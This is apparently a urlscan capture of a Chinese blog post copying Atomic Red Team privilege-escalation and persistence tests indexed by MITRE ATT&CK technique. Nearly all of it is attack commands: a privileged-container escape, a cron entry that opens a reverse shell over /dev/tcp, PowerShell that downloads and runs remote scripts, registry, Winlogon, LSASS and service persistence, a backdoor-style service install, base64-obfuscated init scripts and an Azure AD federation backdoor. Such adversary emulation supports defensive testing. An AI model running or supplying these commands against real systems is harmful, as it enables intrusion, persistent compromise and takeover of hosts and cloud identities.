www.cnblogs.com
Open in
urlscan Pro
2400:3200:1300::ec2
Public Scan
URL:
https://www.cnblogs.com/autopwn/p/17511222.html
Submission: On November 24 via manual from RU — Scanned from DE
Submission: On November 24 via manual from RU — Scanned from DE
Form analysis
1 forms found in the DOMGET https://zzk.cnblogs.com/s
<form id="zzk_search" class="navbar-search dropdown" action="https://zzk.cnblogs.com/s" method="get" role="search">
<input name="w" id="zzk_search_input" placeholder="代码改变世界" type="search" tabindex="3" autocomplete="off">
<button id="zzk_search_button" onclick="window.navbarSearchManager.triggerActiveOption()">
<img id="search_icon" class="focus-hidden" src="//common.cnblogs.com/icons/search.svg" alt="搜索">
<img class="hidden focus-visible" src="//common.cnblogs.com/icons/enter.svg" alt="搜索">
</button>
<ul id="navbar_search_options" class="dropdown-menu quick-search-menu">
<li tabindex="0" class="active" onclick="zzkSearch(event, document.getElementById('zzk_search_input').value)">
<div class="keyword-wrapper">
<img src="//common.cnblogs.com/icons/search.svg" alt="搜索">
<div class="keyword"></div>
</div>
<span class="search-area">所有博客</span>
</li>
<li tabindex="1" onclick="zzkBlogSearch(event, 'autopwn', document.getElementById('zzk_search_input').value)">
<div class="keyword-wrapper">
<img src="//common.cnblogs.com/icons/search.svg" alt="搜索">
<div class="keyword"></div>
</div>
<span class="search-area">当前博客</span>
</li>
</ul>
</form>
Text Content
* * 会员 * 新闻 * 博问 * 闪存 * 班级 * AI培训 * * 所有博客 * 当前博客 * 我的博客 我的园子 账号设置 简洁模式 ... 退出登录 注册 登录 皇帽讲绿帽带法技巧 * 博客园 * 首页 * 新随笔 * 联系 * 订阅 * 管理 随笔 - 611 文章 - 0 评论 - 27 阅读 - 21万 ATOMIC-权限提升 T1611 Escape to Host T1547 Boot or Logon Autostart Execution T1547.015 Boot or Logon Autostart Execution: Login Items T1547.014 Active Setup T1547.010 Boot or Logon Autostart Execution: Port Monitors T1547.009 Boot or Logon Autostart Execution: Shortcut Modification T1547.008 Boot or Logon Autostart Execution: LSASS Driver T1547.007 Boot or Logon Autostart Execution: Re-opened Applications T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions T1547.005 Boot or Logon Autostart Execution: Security Support Provider T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL T1547.003 Time Providers T1547.002 Authentication Package T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1543.004 Create or Modify System Process: Launch Daemon T1543.003 Create or Modify System Process: Windows Service T1543.002 Create or Modify System Process: Systemd Service T1543.001 Create or Modify System Process: Launch Agent T1484.002 Domain Trust Modification T1484.001 Domain Policy Modification: Group Policy Modification T1134.005 Access Token Manipulation: SID-History Injection T1134.004 Access Token Manipulation: Parent PID Spoofing T1134.002 Create Process with Token T1134.001 Access Token Manipulation: Token Impersonation/Theft T1055 Process Injection T1055.012 Process Injection: Process Hollowing T1055.004 Process Injection: Asynchronous Procedure Call T1055.003 Thread Execution Hijacking T1055.001 Process Injection: Dynamic-link Library Injection T1053.007 Kubernetes Cronjob T1053.006 Scheduled Task/Job: Systemd Timers T1053.005 Scheduled Task/Job: Scheduled Task T1053.003 Scheduled Task/Job: Cron T1053.002 Scheduled Task/Job: At T1037.005 Boot or Logon Initialization Scripts: Startup Items T1037.004 Boot or Logon Initialization Scripts: Rc.common T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) -------------------------------------------------------------------------------- T1611 ESCAPE TO HOST * Atomic Test #1 - Deploy container using nsenter container escape * Atomic Test #2 - Mount host filesystem to escape privileged Docker container DEPLOY CONTAINER USING NSENTER CONTAINER ESCAPE kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod --restart=Never -ti --rm --image alpine --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}' MOUNT HOST FILESYSTEM TO ESCAPE PRIVILEGED DOCKER CONTAINER if [ ! -d #{mount_point} ]; then mkdir #{mount_point} ; mount #{mount_device} #{mount_point}; fi echo -n "* * * * * root /bin/bash -c '/bin/bash -c echo \"\"; echo \"hello from host! " > #{mount_point}#{cron_path}/#{cron_filename} echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename} echo -n "(hostname) " >> #{mount_point}#{cron_path}/#{cron_filename} echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename} echo "(id)\" >& /dev/tcp/#{listen_address}/#{listen_port} 0>&1'" >> #{mount_point}#{cron_path}/#{cron_filename} netcat -l -p #{listen_port} 2>&1 -------------------------------------------------------------------------------- T1547 BOOT OR LOGON AUTOSTART EXECUTION * Atomic Test #1 - Add a driver ADD A DRIVER pnputil.exe /add-driver "#{driver_inf}" -------------------------------------------------------------------------------- T1547.015 BOOT OR LOGON AUTOSTART EXECUTION: LOGIN ITEMS * Atomic Test #1 - Persistence by modifying Windows Terminal profile * Atomic Test #2 - Add macOS LoginItem using Applescript PERSISTENCE BY MODIFYING WINDOWS TERMINAL PROFILE mv #{settings_json_def} #{settings_json_tmp} Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/src/settings.json?raw=true" -OutFile "#{settings_json_def}" wt.exe ADD MACOS LOGINITEM USING APPLESCRIPT osascript #{scriptfile} -------------------------------------------------------------------------------- T1547.014 ACTIVE SETUP * Atomic Test #1 - HKLM - Add atomic_test key to launch executable as part of user setup * Atomic Test #2 - HKLM - Add malicious StubPath value to existing Active Setup Entry * Atomic Test #3 - HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number HKLM - ADD ATOMIC_TEST KEY TO LAUNCH EXECUTABLE AS PART OF USER SETUP New-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components" -Name "atomic_test" -Force Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "(Default)" "ART TEST" -Force Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "StubPath" "#{payload}" -Force & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup HKLM - ADD MALICIOUS STUBPATH VALUE TO EXISTING ACTIVE SETUP ENTRY Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup HKLM - RE-EXECUTE 'INTERNET EXPLORER CORE FONTS' STUBPATH PAYLOAD BY DECREASING VERSION NUMBER Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0" & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup -------------------------------------------------------------------------------- T1547.010 BOOT OR LOGON AUTOSTART EXECUTION: PORT MONITORS * Atomic Test #1 - Add Port Monitor persistence in Registry ADD PORT MONITOR PERSISTENCE IN REGISTRY reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam" /v "Driver" /d "#{monitor_dll}" /t REG_SZ -------------------------------------------------------------------------------- T1547.009 BOOT OR LOGON AUTOSTART EXECUTION: SHORTCUT MODIFICATION * Atomic Test #1 - Shortcut Modification * Atomic Test #2 - Create shortcut to cmd in startup folders SHORTCUT MODIFICATION echo [InternetShortcut] > #{shortcut_file_path} echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} #{shortcut_file_path} CREATE SHORTCUT TO CMD IN STARTUP FOLDERS $Shell = New-Object -ComObject ("WScript.Shell") $ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") $ShortCut.TargetPath="cmd.exe" $ShortCut.WorkingDirectory = "C:\Windows\System32"; $ShortCut.WindowStyle = 1; $ShortCut.Description = "T1547.009."; $ShortCut.Save() $Shell = New-Object -ComObject ("WScript.Shell") $ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") $ShortCut.TargetPath="cmd.exe" $ShortCut.WorkingDirectory = "C:\Windows\System32"; $ShortCut.WindowStyle = 1; $ShortCut.Description = "T1547.009."; $ShortCut.Save() -------------------------------------------------------------------------------- T1547.008 BOOT OR LOGON AUTOSTART EXECUTION: LSASS DRIVER Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt MODIFY REGISTRY TO LOAD ARBITRARY DLL INTO LSASS - LSADBEXTPT New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "#{dll_path}" -------------------------------------------------------------------------------- T1547.007 BOOT OR LOGON AUTOSTART EXECUTION: RE-OPENED APPLICATIONS * Atomic Test #1 - Copy in loginwindow.plist for Re-Opened Applications * Atomic Test #2 - Re-Opened Applications using LoginHook * Atomic Test #3 - Append to existing loginwindow for Re-Opened Applications COPY IN LOGINWINDOW. PLIST FOR RE-OPENED APPLICATIONS cp #{calc_plist_path} ~/Library/Preferences/ByHost/com.apple.loginwindow.plist RE-OPENED APPLICATIONS USING LOGINHOOK sudo defaults write com.apple.loginwindow LoginHook #{script} APPEND TO EXISTING LOGINWINDOW FOR RE-OPENED APPLICATIONS FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1` if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi echo save backup copy to /tmp/ cp ${FILE} /tmp/t1547007_loginwindow-backup.plist echo before plutil -p ${FILE} echo overwriting... #{exe_path} ${FILE} && echo after && plutil -p ${FILE} -------------------------------------------------------------------------------- T1547.006 BOOT OR LOGON AUTOSTART EXECUTION: KERNEL MODULES AND EXTENSIONS * Atomic Test #1 - Linux - Load Kernel Module via insmod * Atomic Test #2 - MacOS - Load Kernel Module via kextload and kmutil * Atomic Test #3 - MacOS - Load Kernel Module via KextManagerLoadKextWithURL() * Atomic Test #4 - Snake Malware Kernel Driver Comadmin LINUX - LOAD KERNEL MODULE VIA INSMOD sudo insmod #{module_path} MACOS - LOAD KERNEL MODULE VIA KEXTLOAD AND KMUTIL set -x sudo kextload #{module_path} kextstat 2>/dev/null | grep SoftRAID sudo kextunload #{module_path} sudo kmutil load -p #{module_path} kextstat 2>/dev/null | grep SoftRAID sudo kmutil unload -p #{module_path} MACOS - LOAD KERNEL MODULE VIA KEXTMANAGERLOADKEXTWITHURL() sudo #{exe_path} kextstat 2>/dev/null | grep SoftRAID sudo kextunload /Library/Extensions/SoftRAID.kext SNAKE MALWARE KERNEL DRIVER COMADMIN $examplePath = Join-Path $env:windir "system32\Com"; if (-not (Test-Path $examplePath)) { New-Item -ItemType Directory -Path $examplePath | Out-Null }; $exampleName = "comadmin.dat"; $exampleFullPath = Join-Path $examplePath $exampleName; $randomBytes = New-Object Byte[] 0x1000; (New-Object Random).NextBytes($randomBytes); [System.IO.File]::WriteAllBytes($exampleFullPath, $randomBytes) -------------------------------------------------------------------------------- T1547.005 BOOT OR LOGON AUTOSTART EXECUTION: SECURITY SUPPORT PROVIDER * Atomic Test #1 - Modify SSP configuration in registry MODIFY SSP CONFIGURATION IN REGISTRY # run these in sequence $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' $SecurityPackagesUpdated = $SecurityPackages $SecurityPackagesUpdated += "#{fake_ssp_dll}" Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated # revert (before reboot) Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages -------------------------------------------------------------------------------- T1547.004 BOOT OR LOGON AUTOSTART EXECUTION: WINLOGON HELPER DLL * Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell * Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell * Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell * Atomic Test #4 - Winlogon HKLM Shell Key Persistence - PowerShell * Atomic Test #5 - Winlogon HKLM Userinit Key Persistence - PowerShell WINLOGON SHELL KEY PERSISTENCE - POWERSHELL Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force WINLOGON USERINIT KEY PERSISTENCE - POWERSHELL Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force WINLOGON NOTIFY KEY LOGON PERSISTENCE - POWERSHELL New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force WINLOGON HKLM SHELL KEY PERSISTENCE - POWERSHELL Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force WINLOGON HKLM USERINIT KEY PERSISTENCE - POWERSHELL Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force -------------------------------------------------------------------------------- T1547.003 TIME PROVIDERS * Atomic Test #1 - Create a new time provider * Atomic Test #2 - Edit an existing time provider CREATE A NEW TIME PROVIDER net stop w32time Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "InputProvider" /d "1" /f net start w32time EDIT AN EXISTING TIME PROVIDER net stop w32time Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f net start w32time -------------------------------------------------------------------------------- T1547 .002 AUTHENTICATION PACKAGE * Atomic Test #1 - Authentication Package AUTHENTICATION PACKAGE Copy-Item $PathToAtomicsFolder\T1547.002\bin\package.dll C:\Windows\System32\ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v "Authentication Packages" /t REG_MULTI_SZ /d "msv1_0\0package.dll" /f -------------------------------------------------------------------------------- T1547.001 BOOT OR LOGON AUTOSTART EXECUTION: REGISTRY RUN KEYS / STARTUP FOLDER * Atomic Test #1 - Reg Key Run * Atomic Test #2 - Reg Key RunOnce * Atomic Test #3 - PowerShell Registry RunOnce * Atomic Test #4 - Suspicious vbs file run from startup Folder * Atomic Test #5 - Suspicious jse file run from startup Folder * Atomic Test #6 - Suspicious bat file run from startup Folder * Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder * Atomic Test #8 - Add persistance via Recycle bin * Atomic Test #9 - SystemBC Malware-as-a-Service Registry * Atomic Test #10 - Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value * Atomic Test #11 - Change Startup Folder - HKCU Modify User Shell Folders Startup Value * Atomic Test #12 - HKCU - Policy Settings Explorer Run Key * Atomic Test #13 - HKLM - Policy Settings Explorer Run Key * Atomic Test #14 - HKLM - Append Command to Winlogon Userinit KEY Value * Atomic Test #15 - HKLM - Modify default System Shell - Winlogon Shell KEY Value * Atomic Test #16 - secedit used to create a Run key in the HKLM Hive * Atomic Test #17 - Modify BootExecute Value REG KEY RUN REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" REG KEY RUNONCE REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" POWERSHELL REGISTRY RUNONCE $RunOnceKey = "#{reg_key_path}" set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"' SUSPICIOUS VBS FILE RUN FROM STARTUP FOLDER Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" SUSPICIOUS JSE FILE RUN FROM STARTUP FOLDER Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" SUSPICIOUS BAT FILE RUN FROM STARTUP FOLDER Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" ADD EXECUTABLE SHORTCUT LINK TO USER STARTUP FOLDER $Target = "C:\Windows\System32\calc.exe" $ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" $WScriptShell = New-Object -ComObject WScript.Shell $Create = $WScriptShell.CreateShortcut($ShortcutLocation) $Create.TargetPath = $Target $Create.Save() ADD PERSISTANCE VIA RECYCLE BIN reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f SYSTEMBC MALWARE-AS-A-SERVICE REGISTRY $RunKey = "#{reg_key_path}" Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}" CHANGE STARTUP FOLDER - HKLM MODIFY USER SHELL FOLDERS COMMON STARTUP VALUE New-Item -ItemType Directory -path "#{new_startup_folder}" Copy-Item -path "#{payload}" -destination "#{new_startup_folder}" Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "#{new_startup_folder}" CHANGE STARTUP FOLDER - HKCU MODIFY USER SHELL FOLDERS STARTUP VALUE New-Item -ItemType Directory -path "#{new_startup_folder}" Copy-Item -path "#{payload}" -destination "#{new_startup_folder}" Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "#{new_startup_folder}" HKCU - POLICY SETTINGS EXPLORER RUN KEY if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){ New-Item -ItemType Key -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" } Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}" HKLM - POLICY SETTINGS EXPLORER RUN KEY if (!(Test-Path -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){ New-Item -ItemType Key -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" } Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}" HKLM - APPEND COMMAND TO WINLOGON USERINIT KEY VALUE $oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit"); Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit-backup" -Value "$oldvalue"; $newvalue = $oldvalue + " #{payload}"; Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$newvalue" HKLM - MODIFY DEFAULT SYSTEM SHELL - WINLOGON SHELL KEY VALUE $oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell"); Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell-backup" -Value "$oldvalue"; $newvalue = $oldvalue + ", #{payload}"; Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$newvalue" SECEDIT USED TO CREATE A RUN KEY IN THE HKLM HIVE secedit /import /db #{secedit_db} /cfg #{ini_file} secedit /configure /db #{secedit_db} MODIFY BOOTEXECUTE VALUE if (!(Test-Path "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg")) { reg.exe export "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg" /y } Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name "BootExecute" -Value "#{registry_value}" -Type MultiString -------------------------------------------------------------------------------- T1543.004 CREATE OR MODIFY SYSTEM PROCESS: LAUNCH DAEMON * Atomic Test #1 - Launch Daemon LAUNCH DAEMON sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} -------------------------------------------------------------------------------- T1543.003 CREATE OR MODIFY SYSTEM PROCESS: WINDOWS SERVICE * Atomic Test #1 - Modify Fax service to run PowerShell * Atomic Test #2 - Service Installation CMD * Atomic Test #3 - Service Installation PowerShell * Atomic Test #4 - TinyTurla backdoor service w64time * Atomic Test #5 - Remote Service Installation CMD MODIFY FAX SERVICE TO RUN POWERSHELL sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\"" sc start Fax SERVICE INSTALLATION CMD sc.exe create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type} sc.exe start #{service_name} SERVICE INSTALLATION POWERSHELL New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" Start-Service -Name "#{service_name}" TINYTURLA BACKDOOR SERVICE W64TIME copy #{dllfilename} %systemroot%\system32\ sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto sc config W64Time DisplayName= "Windows 64 Time" sc description W64Time "Maintain date and time synch on all clients and services in the network" reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f sc start W64Time REMOTE SERVICE INSTALLATION CMD sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type} sc.exe \\#{remote_host} start #{service_name} -------------------------------------------------------------------------------- T1543.002 CREATE OR MODIFY SYSTEM PROCESS: SYSTEMD SERVICE * Atomic Test #1 - Create Systemd Service * Atomic Test #2 - Create Systemd Service file, Enable the service , Modify and Reload the service. CREATE SYSTEMD SERVICE echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file} echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file} echo "" >> #{systemd_service_path}/#{systemd_service_file} echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file} echo "Type=simple" echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file} echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file} echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file} echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file} echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file} echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file} echo "" >> #{systemd_service_path}/#{systemd_service_file} echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file} echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file} systemctl daemon-reload systemctl enable #{systemd_service_file} systemctl start #{systemd_service_file} CREATE SYSTEMD SERVICE FILE, ENABLE THE SERVICE , MODIFY AND RELOAD THE SERVICE. cat > /etc/init.d/T1543.002 << EOF #!/bin/bash ### BEGIN INIT INFO # Provides : Atomic Test T1543.002 # Required-Start: $all # Required-Stop : # Default-Start: 2 3 4 5 # Default-Stop: # Short Description: Atomic Test for Systemd Service Creation ### END INIT INFO python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))" EOF chmod +x /etc/init.d/T1543.002 if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ; systemctl enable T1543.002 systemctl start T1543.002 echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 systemctl daemon-reload systemctl restart T1543.002 -------------------------------------------------------------------------------- T1543.001 CREATE OR MODIFY SYSTEM PROCESS: LAUNCH AGENT * Atomic Test #1 - Launch Agent * Atomic Test #2 - Event Monitor Daemon Persistence LAUNCH AGENT if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi; sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename} sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename} EVENT MONITOR DAEMON PERSISTENCE sudo cp #{script_location} #{script_destination} sudo touch /private/var/db/emondClients/#{empty_file} -------------------------------------------------------------------------------- T1484.002 DOMAIN TRUST MODIFICATION * Atomic Test #1 - Add Federation to Azure AD ADD FEDERATION TO AZURE AD Import-Module AzureAD Import-Module AADInternals $PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword try { Connect-AzureAD -Credential $Credential -ErrorAction Stop > $null } catch { Write-Host "Error: AzureAD could not connect" exit 1 } try { $domain = Get-AzureADDomain -Name "#{domain_name}" } catch { Write-Host "Error: domain ""#{domain_name}"" not found" exit 1 } if (-Not $domain.IsVerified) { Write-Host "Error: domain ""#{domain_name}"" not verified" exit 1 } if ($domain.AuthenticationType -eq "Federated") { Write-Host "Error: domain ""#{domain_name}"" already federated. Try with a different domain or re-create it before." exit 1 } $at = Get-AADIntAccessTokenForAADGraph -Credentials $Credential if (-Not $at) { Write-Host "Error: AADInternals could not connect" exit 1 } $new = ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "#{domain_name}" if ($new) { Write-Host "Federation successfully added to Azure AD" Write-Host $new } else { Write-Host "The federation setup failed" } Write-Host "End of federation configuration." 